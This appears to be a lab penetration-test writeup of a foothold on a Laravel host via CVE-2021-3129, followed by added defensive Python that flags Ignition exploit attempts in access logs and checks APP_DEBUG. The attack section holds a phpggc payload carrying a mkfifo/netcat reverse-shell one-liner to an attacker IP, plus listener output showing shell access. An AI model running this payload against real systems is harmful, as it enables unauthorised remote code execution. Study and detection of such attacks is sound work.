Foothold
Press enable first
$ cp /var/lib/inetsim/http/fakefiles/sample.jpg .
Picture didn't show up so I browsed to /uploads and received the following
$ git clone https://github.com/zhzyker/CVE-2021-3129.git
Cloning into 'CVE-2021-3129'...
remote: Enumerating objects: 348, done.
remote: Counting objects: 100% (348/348), done.
remote: Compressing objects: 100% (242/242), done.
remote: Total 348 (delta 68), reused 322 (delta 57), pack-reused 0 (from 0)
Receiving objects: 100% (348/348), 1.73 MiB | 7.13 MiB/s, done.
Resolving deltas: 100% (68/68), done.
Add our session cookies to the exploit as request headers
...
header={
"Accept": "application/json",
"Cookie": "XSRF-TOKEN=eyJpdiI6IlBmSDlBcFU2eGVKOGc5QXUrcldWbWc9PSIsInZhbHVlIjoiaUlYUGJQakwxYUw1SVRmTTlnZFNWMlJRc3VOWm5EL2paRFc2S0IrN3M3L0MwZTFIeUtxK2R3QUEyYzF4M2QzUHZPd3QrYkVGU3NDZkRUa2ZXYnc1UWNCWU4xeW5ETXd4T3MxOG9lLzVuemt5U0xlcldqb0FMSXIraDQ0OThvVWQiLCJtYWMiOiJlY2IzMjNjOWM0MzdhNzE1NTcxY2JhYmNkYWZmZjBjZDE3MzZiNzgwMDhjNTk4ZTBhZjk4YjcyNWYyMzNiMTFlIn0%3D; lavita_session=eyJpdiI6IndrSnltdjhWVWxTUVdOOVFOUnlaN1E9PSIsInZhbHVlIjoiUVdWcGZxdC9KNk5WaHpaTG1IZGl3OEN6dW9YUDNQSjlLcnoxYUxsWStaTTZKS25LZEcxR2dsUSs0WWtxd0YvQnhYZUJQQWwyL213YkIvRDdjTWRlREFpOWZEQmdjbjBPRFpZb3VqY0pkK081UThsU0s0cC9jb0o5ekl2UmdLbzEiLCJtYWMiOiJhYWJkOTM3ZDNjNDIyM2MzOTc2YTZjY2Y2MTA0YTM4ZjNkNDUyZTg0Y2QwOWY3MmI4MDI3M2ViNzM4NjRhMDc3In0%3D"
}
...
$ python3 exp.py http://192.168.111.38/home
Edit the payload in the Laravel/RCE6 entry
...
"Laravel/RCE6":r"""
php -d "phar.readonly=0" ./phpggc Laravel/RCE6 "system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.45.168 1337 >/tmp/f');" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
...
$ python3 exp.py http://192.168.111.38/home
$ nc -lnvp 1337
listening on [any] 1337 ...
connect to [192.168.45.168] from (UNKNOWN) [192.168.111.38] 40010
/bin/sh: 0: can't access tty; job control turned off
$ whoami && ip a
www-data
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:bf:c7:ba brd ff:ff:ff:ff:ff:ff
altname enp11s0
inet 192.168.111.38/24 brd 192.168.111.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 fe80::250:56ff:febf:c7ba/64 scope link
valid_lft forever preferred_lft forever
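The steps above show what CVE-2021-3129 exploitation looks like from the attacker's terminal; below is an added example, written from the defender's side and not part of this writeup or the zhzyker repository, that flags the same activity in web-server access logs and checks the APP_DEBUG precondition in a Laravel .env file. The log lines and .env content are constructed samples; the combined log format and the Ignition endpoint path are assumptions about the target's deployment.

```python
"""Detection helpers for CVE-2021-3129 (Laravel Ignition RCE) attempts.
Assumes Apache/nginx "combined" access-log format; sample data is constructed."""
import re
from collections import Counter

# combined format: ip - user [time] "METHOD path HTTP/x" status bytes "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Ignition's solution-runner route; the CVE is triggered by POSTing to it.
IGNITION_PATH = "/_ignition/execute-solution"

# Constructed sample: normal traffic plus the burst of POSTs an exploit script makes
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /home HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /uploads/sample.jpg HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /_ignition/execute-solution HTTP/1.1" 200 0 "-" "python-requests/2.31"
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "POST /_ignition/execute-solution HTTP/1.1" 500 0 "-" "python-requests/2.31"
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /login HTTP/1.1" 200 3321 "-" "Mozilla/5.0"
"""

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_ignition_hits(log_text):
    """Return every parsed request whose path is the Ignition execute-solution route."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec["path"].split("?")[0] == IGNITION_PATH:
            hits.append(rec)
    return hits

def summarize_by_source(hits):
    """Count hits per client IP; the exploit chains several POSTs, so bursts stand out."""
    return Counter(h["ip"] for h in hits)

def debug_mode_enabled(env_text):
    """True if a Laravel .env leaves APP_DEBUG on, which (by Ignition's default
    config) is what makes the runnable-solutions endpoint available at all."""
    for line in env_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() == "APP_DEBUG":
            return value.strip().strip('"').lower() == "true"
    return False
```

Fixing the precondition (APP_DEBUG=false in production) and upgrading Ignition closes the route this writeup abuses; the log check is for finding attempts that already happened.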